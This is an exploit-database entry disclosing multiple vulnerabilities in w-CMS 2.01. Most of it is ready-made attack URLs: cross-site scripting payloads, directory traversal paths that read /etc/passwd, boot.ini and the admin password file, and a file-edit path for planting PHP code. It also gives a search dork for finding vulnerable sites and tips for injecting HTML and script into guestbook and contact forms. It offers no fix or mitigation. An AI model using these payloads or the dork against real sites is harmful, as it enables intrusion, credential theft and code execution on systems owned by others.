w-CMS 2.01 Multiple Vulnerabilities

2012-01-10T00:00:00
ID 1337DAY-ID-17363
Type zdt
Reporter th3.g4m3_0v3r
Modified 2012-01-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: W-Cms Multiple Vulnerability
# Date: 2012-01-09
# Author: th3.g4m3_0v3r
# Site:http://w-cms.info/
# Software Link: http://code.google.com/p/wcms/
# Dork: intext:"Powered by w-CMS"
# Version : [2.01]
# Tested on: Window 7
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.h4ck3r.in            www.root-team.com             www.hackingmind.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
W-CMS cross site scripting
_______________
 
Vulnerable Link __________\/_____________________
_______________
 
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
http://localhost/?p=3"XSS"
http://localhost/?bid=5&p=1"XSS"
 
 
http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
method=POST id=searchFORMname=searchFORM
  style="margin:0;padding:0"><INPUT type="hidden" value=""
name="txtSEARCH"></FORM>

~ [PoC]Http://[victim]/path/?p=<script>alert('1')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('1')</script>
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
directory traversal attacks
 
This script is possibly vulnerable to directory traversal attacks
 
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../1.php
 
Just Fill The Text Area With Evil Code (Php) & Click Save
 

 
+----------------------------------------------------------------------+
 
Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle : <H3>Own3d</H3>
++ You Can Inject Xss Too
Exapmle : <script>alert('1')</script>
 
+----------------------------------------------------------------------+

 
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net



#  0day.today [2018-02-19]  #